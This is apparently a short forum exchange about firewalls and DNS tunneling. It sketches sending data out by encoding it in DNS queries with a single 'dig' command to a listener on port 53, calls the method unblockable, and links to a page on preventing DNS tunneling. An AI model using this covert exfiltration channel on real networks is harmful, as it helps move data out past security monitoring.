Any modern enterprise firewall has app identification built in and will quickly identify you trying to send non dns traffic. And after the solarwinds debacle, everyone with a security team is looking for it.
dig -b peername data.data.data.data
And let the "name server" on the other end listening on port 53 parse the data. You _would_ have to be able to listen on port 53 and of course it would be slow as hell, but it's unblockable.
https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunn...
See the "Preventing DNS Tunneling" chapter.